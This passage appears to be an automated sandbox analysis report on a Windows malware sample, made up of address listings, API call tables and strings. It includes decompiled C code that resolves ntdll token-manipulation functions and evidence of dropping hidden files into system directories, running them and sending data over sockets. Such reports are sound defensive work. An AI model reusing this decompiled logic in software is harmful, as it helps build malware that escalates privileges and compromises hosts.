                                                                                0x00000000
                                                                                0x0040d5c5
                                                                                0x0040d5ac
                                                                                0x0040d5ad
                                                                                0x0040d5b0
                                                                                0x0040d5b3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d5b5
                                                                                0x0040d5c8
                                                                                0x0040d5c8
                                                                                0x0040d5cb
                                                                                0x0040d5cb
                                                                                0x00000000
                                                                                0x0040d5d3
                                                                                0x0040cbdf
                                                                                0x0040cbe2
                                                                                0x0040ce26
                                                                                0x0040ce2c
                                                                                0x0040ce2e
                                                                                0x0040ce31
                                                                                0x0040ce34
                                                                                0x0040ce36
                                                                                0x0040cea0
                                                                                0x0040cea6
                                                                                0x0040cea8
                                                                                0x0040ceaf
                                                                                0x0040ceb9
                                                                                0x0040cebf
                                                                                0x0040cec2
                                                                                0x0040d53e
                                                                                0x0040d53e
                                                                                0x0040d541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cec9
                                                                                0x0040cecc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ced2
                                                                                0x0040ced5
                                                                                0x0040d519
                                                                                0x0040d519
                                                                                0x0040d524
                                                                                0x0040d526
                                                                                0x0040d529
                                                                                0x0040d53b
                                                                                0x00000000
                                                                                0x0040cedb
                                                                                0x0040cee8
                                                                                0x0040ceed
                                                                                0x0040ceef
                                                                                0x0040cef2
                                                                                0x0040cef4
                                                                                0x0040cef9
                                                                                0x0040cefe
                                                                                0x0040cf00
                                                                                0x0040cf00
                                                                                0x0040cf02
                                                                                0x0040cf02
                                                                                0x0040cf04
                                                                                0x0040cf06
                                                                                0x0040cf0b
                                                                                0x0040cf0d
                                                                                0x0040cf12
                                                                                0x0040cf14
                                                                                0x0040cf1a
                                                                                0x0040cf20
                                                                                0x0040cf20
                                                                                0x0040cf1c
                                                                                0x0040cf1c
                                                                                0x0040cf1c
                                                                                0x0040cf25
                                                                                0x0040cf25
                                                                                0x0040cf27
                                                                                0x0040cf29
                                                                                0x0040cf2b
                                                                                0x0040cf81
                                                                                0x0040cf83
                                                                                0x0040cfdc
                                                                                0x0040cfe1
                                                                                0x0040d020
                                                                                0x0040d025
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d033
                                                                                0x0040d039
                                                                                0x0040d03f
                                                                                0x0040d042
                                                                                0x0040d042
                                                                                0x0040d044
                                                                                0x0040d045
                                                                                0x0040d045
                                                                                0x0040d049
                                                                                0x0040d04b
                                                                                0x0040d04d
                                                                                0x0040d04f
                                                                                0x0040d057
                                                                                0x0040d059
                                                                                0x0040d059
                                                                                0x0040d057
                                                                                0x0040d06d
                                                                                0x0040d073
                                                                                0x0040d07a
                                                                                0x0040d07a
                                                                                0x0040d07d
                                                                                0x0040d07d
                                                                                0x0040d07f
                                                                                0x0040d080
                                                                                0x0040d080
                                                                                0x0040d084
                                                                                0x0040d084
                                                                                0x00000000
                                                                                0x0040d084
                                                                                0x0040cfef
                                                                                0x0040cff5
                                                                                0x0040cffb
                                                                                0x0040cffe
                                                                                0x0040cffe
                                                                                0x0040d000
                                                                                0x0040d001
                                                                                0x0040d001
                                                                                0x0040d005
                                                                                0x0040d005
                                                                                0x00000000
                                                                                0x0040cf85
                                                                                0x0040cfb1
                                                                                0x0040cfbe
                                                                                0x0040cfc3
                                                                                0x0040cfc9
                                                                                0x0040cfcc
                                                                                0x0040cfcf
                                                                                0x0040cfcf
                                                                                0x0040cfd1
                                                                                0x0040cfd2
                                                                                0x0040cfd2
                                                                                0x0040cfd8
                                                                                0x0040d007
                                                                                0x0040d007
                                                                                0x0040d009
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d00b
                                                                                0x00000000
                                                                                0x0040d00b
                                                                                0x0040cf2d
                                                                                0x0040cf2d
                                                                                0x0040cf30
                                                                                0x0040cf32
                                                                                0x0040cf32
                                                                                0x0040cf58
                                                                                0x0040cf58
                                                                                0x0040cf58
                                                                                0x0040cf5a
                                                                                0x0040cf5b
                                                                                0x0040cf5b
                                                                                0x0040cf61
                                                                                0x0040cf63
                                                                                0x0040cf65
                                                                                0x0040d086
                                                                                0x0040d086
                                                                                0x0040d089
                                                                                0x0040d0fe
                                                                                0x0040d104
                                                                                0x0040d104
                                                                                0x0040d105
                                                                                0x0040d10c
                                                                                0x0040d112
                                                                                0x0040d112
                                                                                0x0040d115
                                                                                0x0040d124
                                                                                0x0040d129
                                                                                0x0040d129
                                                                                0x0040d12c
                                                                                0x0040d130
                                                                                0x0040d13e
                                                                                0x0040d144
                                                                                0x0040d145
                                                                                0x0040d147
                                                                                0x0040d155
                                                                                0x0040d155
                                                                                0x0040d147
                                                                                0x0040d177
                                                                                0x0040d179
                                                                                0x0040d17c
                                                                                0x0040d33e
                                                                                0x0040d372
                                                                                0x0040d37f
                                                                                0x0040d384
                                                                                0x0040d38a
                                                                                0x0040d38d
                                                                                0x0040d390
                                                                                0x0040d390
                                                                                0x0040d392
                                                                                0x0040d393
                                                                                0x0040d393
                                                                                0x0040d397
                                                                                0x0040d399
                                                                                0x0040d39b
                                                                                0x0040d39d
                                                                                0x0040d3a5
                                                                                0x0040d3a7
                                                                                0x0040d3a7
                                                                                0x0040d3a5
                                                                                0x0040d3bd
                                                                                0x0040d3c3
                                                                                0x0040d3c7
                                                                                0x0040d3d5
                                                                                0x0040d3db
                                                                                0x0040d3dc
                                                                                0x0040d3de
                                                                                0x0040d3ec
                                                                                0x0040d3ec
                                                                                0x0040d3de
                                                                                0x0040d40e
                                                                                0x0040d410
                                                                                0x0040d413
                                                                                0x0040d428
                                                                                0x0040d42f
                                                                                0x0040d435
                                                                                0x0040d439
                                                                                0x0040d447
                                                                                0x0040d44d
                                                                                0x0040d44e
                                                                                0x0040d450
                                                                                0x0040d45b
                                                                                0x0040d45b
                                                                                0x0040d450
                                                                                0x0040d461
                                                                                0x0040d461
                                                                                0x00000000
                                                                                0x0040d182
                                                                                0x0040d195
                                                                                0x0040d19c
                                                                                0x0040d1a2
                                                                                0x0040d1a6
                                                                                0x0040d1b4
                                                                                0x0040d1bb
                                                                                0x0040d1bd
                                                                                0x0040d1c8
                                                                                0x0040d1c8
                                                                                0x0040d1bd
                                                                                0x0040d1da
                                                                                0x0040d1e1
                                                                                0x0040d1e7
                                                                                0x0040d1e8
                                                                                0x0040d1ea
                                                                                0x0040d468
                                                                                0x0040d468
                                                                                0x0040d46b
                                                                                0x0040d47a
                                                                                0x0040d47f
                                                                                0x0040d47f
                                                                                0x0040d482
                                                                                0x0040d485
                                                                                0x0040d48b
                                                                                0x0040d48e
                                                                                0x0040d496
                                                                                0x0040d49b
                                                                                0x0040d4a2
                                                                                0x0040d4ac
                                                                                0x0040d4b1
                                                                                0x0040d4d8
                                                                                0x0040d4de
                                                                                0x0040d4e4
                                                                                0x0040d4e6
                                                                                0x0040d500
                                                                                0x0040d506
                                                                                0x0040d513
                                                                                0x0040d4e8
                                                                                0x0040d4f4
                                                                                0x0040d4fc
                                                                                0x0040d4fc
                                                                                0x0040d4e6
                                                                                0x0040d48e
                                                                                0x00000000
                                                                                0x0040d1f0
                                                                                0x0040d1fd
                                                                                0x0040d231
                                                                                0x0040d23e
                                                                                0x0040d243
                                                                                0x0040d249
                                                                                0x0040d24c
                                                                                0x0040d24f
                                                                                0x0040d24f
                                                                                0x0040d251
                                                                                0x0040d252
                                                                                0x0040d252
                                                                                0x0040d256
                                                                                0x0040d258
                                                                                0x0040d25a
                                                                                0x0040d25c
                                                                                0x0040d264
                                                                                0x0040d266
                                                                                0x0040d266
                                                                                0x0040d264
                                                                                0x0040d27c
                                                                                0x0040d282
                                                                                0x0040d286
                                                                                0x0040d294
                                                                                0x0040d29a
                                                                                0x0040d29b
                                                                                0x0040d29d
                                                                                0x0040d2ab
                                                                                0x0040d2ab
                                                                                0x0040d29d
                                                                                0x0040d2cd
                                                                                0x0040d2cf
                                                                                0x0040d2d2
                                                                                0x0040d2eb
                                                                                0x0040d2f2
                                                                                0x0040d2f8
                                                                                0x0040d2fc
                                                                                0x0040d30e
                                                                                0x0040d314
                                                                                0x0040d315
                                                                                0x0040d317
                                                                                0x0040d326
                                                                                0x0040d326
                                                                                0x0040d317
                                                                                0x0040d2fc
                                                                                0x00000000
                                                                                0x0040d2d2
                                                                                0x0040d1ea
                                                                                0x0040d17c
                                                                                0x0040d08b
                                                                                0x0040d094
                                                                                0x0040d097
                                                                                0x0040d097
                                                                                0x0040d09a
                                                                                0x0040d09d
                                                                                0x0040d0bb
                                                                                0x0040d0bb
                                                                                0x0040d0c2
                                                                                0x0040d0c4
                                                                                0x0040d0c6
                                                                                0x0040d0f4
                                                                                0x0040d0f9
                                                                                0x00000000
                                                                                0x0040d0f9
                                                                                0x0040d0c8
                                                                                0x0040d0ca
                                                                                0x0040d0d3
                                                                                0x0040d0d5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d0d7
                                                                                0x00000000
                                                                                0x0040d0d7
                                                                                0x0040d0cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d09f
                                                                                0x0040d09f
                                                                                0x0040d09f
                                                                                0x0040d0a8
                                                                                0x0040d0ab
                                                                                0x0040d0ae
                                                                                0x0040d0b5
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x00000000
                                                                                0x0040d09f
                                                                                0x0040cf6b
                                                                                0x0040cf72
                                                                                0x0040cf74
                                                                                0x0040cf7a
                                                                                0x0040d013
                                                                                0x0040d013
                                                                                0x0040d015
                                                                                0x0040d01d
                                                                                0x0040d01d
                                                                                0x0040d013
                                                                                0x00000000
                                                                                0x0040cf35
                                                                                0x0040cf35
                                                                                0x0040cf37
                                                                                0x0040cf38
                                                                                0x0040cf3a
                                                                                0x00000000
                                                                                0x0040cf3c
                                                                                0x0040cf3c
                                                                                0x0040cf47
                                                                                0x0040cf4c
                                                                                0x0040cf52
                                                                                0x0040cf55
                                                                                0x00000000
                                                                                0x0040cf55
                                                                                0x0040cf3a
                                                                                0x0040cf2b
                                                                                0x0040ced5
                                                                                0x0040d547
                                                                                0x0040d54e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d554
                                                                                0x0040d557
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d55d
                                                                                0x0040d563
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d56c
                                                                                0x0040d577
                                                                                0x0040d57d
                                                                                0x0040d583
                                                                                0x0040ce38
                                                                                0x0040ce38
                                                                                0x0040ce38
                                                                                0x0040ce3b
                                                                                0x0040ce3f
                                                                                0x0040ce3f
                                                                                0x0040ce40
                                                                                0x0040ce89
                                                                                0x0040ce90
                                                                                0x0040ce42
                                                                                0x0040ce42
                                                                                0x0040ce42
                                                                                0x0040ce43
                                                                                0x0040ce76
                                                                                0x0040ce7d
                                                                                0x0040ce80
                                                                                0x0040ce45
                                                                                0x0040ce45
                                                                                0x0040ce46
                                                                                0x0040ce56
                                                                                0x0040ce5d
                                                                                0x0040ce60
                                                                                0x0040ce60
                                                                                0x0040ce46
                                                                                0x0040ce43
                                                                                0x0040ce98
                                                                                0x0040ce99
                                                                                0x0040ce9c
                                                                                0x0040ce9c
                                                                                0x00000000
                                                                                0x0040ce3b
                                                                                0x0040ce36
                                                                                0x0040cbe8
                                                                                0x0040cbeb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbf1
                                                                                0x0040cbf5
                                                                                0x0040cdf2
                                                                                0x0040cdfa
                                                                                0x0040ce04
                                                                                0x0040ce09
                                                                                0x0040ce13
                                                                                0x0040ce16
                                                                                0x0040ce1b
                                                                                0x00000000
                                                                                0x0040ce1b
                                                                                0x0040cbfb
                                                                                0x0040cc00
                                                                                0x0040cc02
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cc0d
                                                                                0x0040cc10
                                                                                0x0040cc16
                                                                                0x0040cdd2
                                                                                0x0040cdd2
                                                                                0x0040cdd8
                                                                                0x0040cde2
                                                                                0x0040cde7
                                                                                0x00000000
                                                                                0x0040cc1c
                                                                                0x0040cc28
                                                                                0x0040cc35
                                                                                0x0040cc3a
                                                                                0x0040cc3b
                                                                                0x0040cc47
                                                                                0x0040cc4a
                                                                                0x0040cc64
                                                                                0x0040cc64
                                                                                0x0040cc66
                                                                                0x0040cc4c
                                                                                0x0040cc55
                                                                                0x0040cc58
                                                                                0x0040cc5b
                                                                                0x0040cc62
                                                                                0x0040cc63
                                                                                0x0040cc63
                                                                                0x00000000
                                                                                0x0040cc68
                                                                                0x0040cc8d
                                                                                0x0040cc9a
                                                                                0x0040cc9f
                                                                                0x0040ccb4
                                                                                0x0040ccba
                                                                                0x0040ccbd
                                                                                0x0040ccc0
                                                                                0x0040ccdc
                                                                                0x0040cce2
                                                                                0x0040cce5
                                                                                0x0040cce7
                                                                                0x0040cdcc
                                                                                0x0040cced
                                                                                0x0040cced
                                                                                0x0040ccf3
                                                                                0x0040ccfe
                                                                                0x0040cd21
                                                                                0x0040cd2a
                                                                                0x0040cd31
                                                                                0x0040cd3b
                                                                                0x0040cd47
                                                                                0x0040cd4d
                                                                                0x0040cd52
                                                                                0x0040cd55
                                                                                0x0040cd77
                                                                                0x0040cd7d
                                                                                0x0040cd7f
                                                                                0x0040cd89
                                                                                0x0040cd98
                                                                                0x0040cd9d
                                                                                0x0040cda5
                                                                                0x0040cda5
                                                                                0x0040cdaa
                                                                                0x0040cdac
                                                                                0x0040cdad
                                                                                0x0040cdb2
                                                                                0x0040cdb2
                                                                                0x0040cdb8
                                                                                0x0040cdc4
                                                                                0x0040cdc4
                                                                                0x0040cce7
                                                                                0x00000000
                                                                                0x0040ccc0
                                                                                0x0040cc66
                                                                                0x0040cc16
                                                                                0x0040dad2
                                                                                0x0040dad5
                                                                                0x0040dadb
                                                                                0x00000000
                                                                                0x0040cb60
                                                                                0x0040cb63
                                                                                0x00000000
                                                                                0x0040cb63
                                                                                0x0040cb5e
                                                                                0x0040ca4b
                                                                                0x0040ca4e
                                                                                0x0040ca4e
                                                                                0x00000000
                                                                                0x0040c9d2
                                                                                0x0040c9d2
                                                                                0x0040c9d8
                                                                                0x0040c9e0
                                                                                0x0040c9e1
                                                                                0x0040c9e3
                                                                                0x0040c9e9
                                                                                0x0040c9f1
                                                                                0x0040c9fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c9fb
                                                                                0x00000000
                                                                                0x0040c9d8
                                                                                0x0040c9d0
                                                                                0x0040c9a5
                                                                                0x0040c9ab
                                                                                0x0040c9b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c9b2

                                                                                APIs
                                                                                • closesocket.WS2_32(?), ref: 0040CA4E
                                                                                • closesocket.WS2_32(?), ref: 0040CB63
                                                                                • GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
                                                                                • WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
                                                                                • CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
                                                                                • wsprintfA.USER32 ref: 0040CD21
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
                                                                                • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
                                                                                • CloseHandle.KERNEL32(?), ref: 0040CD98
                                                                                • CloseHandle.KERNEL32(?), ref: 0040CD9D
                                                                                • DeleteFileA.KERNEL32(?), ref: 0040CDC4
                                                                                • CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0040CFEF
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0040D033
                                                                                • lstrcatA.KERNEL32(?,?), ref: 0040D10C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040D19C
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
                                                                                • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
                                                                                • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
                                                                                • CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
                                                                                • closesocket.WS2_32(?), ref: 0040D56C
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040D577
                                                                                • ExitProcess.KERNEL32 ref: 0040D583
                                                                                • wsprintfA.USER32 ref: 0040D81F
                                                                                  • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
                                                                                • closesocket.WS2_32(?), ref: 0040DAD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                • String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                • API String ID: 562065436-3791576231
                                                                                • Opcode ID: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                • Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
                                                                                • Opcode Fuzzy Hash: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                • Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918;
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress( *0x413918, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress( *0x413918, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}






















                                                                                0x00401000
                                                                                0x00401006
                                                                                0x0040100b
                                                                                0x00401023
                                                                                0x0040102a
                                                                                0x004010c2
                                                                                0x004010c4
                                                                                0x004010cb
                                                                                0x0040127b
                                                                                0x0040127b
                                                                                0x004010d1
                                                                                0x004010dc
                                                                                0x004010e1
                                                                                0x004010e3
                                                                                0x004010ea
                                                                                0x00000000
                                                                                0x004010f0
                                                                                0x004010fc
                                                                                0x00401101
                                                                                0x00401103
                                                                                0x0040110a
                                                                                0x00000000
                                                                                0x00401110
                                                                                0x0040111c
                                                                                0x00401121
                                                                                0x00401123
                                                                                0x0040112a
                                                                                0x00000000
                                                                                0x00401130
                                                                                0x0040113b
                                                                                0x00401140
                                                                                0x00401142
                                                                                0x00401149
                                                                                0x00000000
                                                                                0x0040114f
                                                                                0x0040115b
                                                                                0x00401160
                                                                                0x00401162
                                                                                0x00401169
                                                                                0x00000000
                                                                                0x0040116f
                                                                                0x0040117b
                                                                                0x00401180
                                                                                0x00401182
                                                                                0x00401189
                                                                                0x00000000
                                                                                0x0040118f
                                                                                0x0040119a
                                                                                0x0040119f
                                                                                0x004011a1
                                                                                0x004011a8
                                                                                0x00000000
                                                                                0x004011ae
                                                                                0x004011ba
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c8
                                                                                0x00000000
                                                                                0x004011ce
                                                                                0x004011da
                                                                                0x004011df
                                                                                0x004011e1
                                                                                0x004011e8
                                                                                0x00000000
                                                                                0x004011ee
                                                                                0x004011f9
                                                                                0x004011fe
                                                                                0x00401200
                                                                                0x00401207
                                                                                0x00000000
                                                                                0x00401209
                                                                                0x00401215
                                                                                0x0040121a
                                                                                0x0040121c
                                                                                0x00401223
                                                                                0x00000000
                                                                                0x00401225
                                                                                0x00401231
                                                                                0x00401236
                                                                                0x00401238
                                                                                0x0040123f
                                                                                0x00000000
                                                                                0x00401241
                                                                                0x0040124c
                                                                                0x00401251
                                                                                0x00401253
                                                                                0x0040125a
                                                                                0x00000000
                                                                                0x0040125c
                                                                                0x00401268
                                                                                0x0040126d
                                                                                0x0040126f
                                                                                0x00401276
                                                                                0x00401276
                                                                                0x00401279
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401279
                                                                                0x0040125a
                                                                                0x0040123f
                                                                                0x00401223
                                                                                0x00401207
                                                                                0x004011e8
                                                                                0x004011c8
                                                                                0x004011a8
                                                                                0x00401189
                                                                                0x00401169
                                                                                0x00401149
                                                                                0x0040112a
                                                                                0x0040110a
                                                                                0x004010ea
                                                                                0x0040127f
                                                                                0x004010ae
                                                                                0x004010b4
                                                                                0x004010b4
                                                                                0x0040100d
                                                                                0x00401012
                                                                                0x00401018
                                                                                0x0040101f
                                                                                0x00000000
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x00401022
                                                                                0x0040101f

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
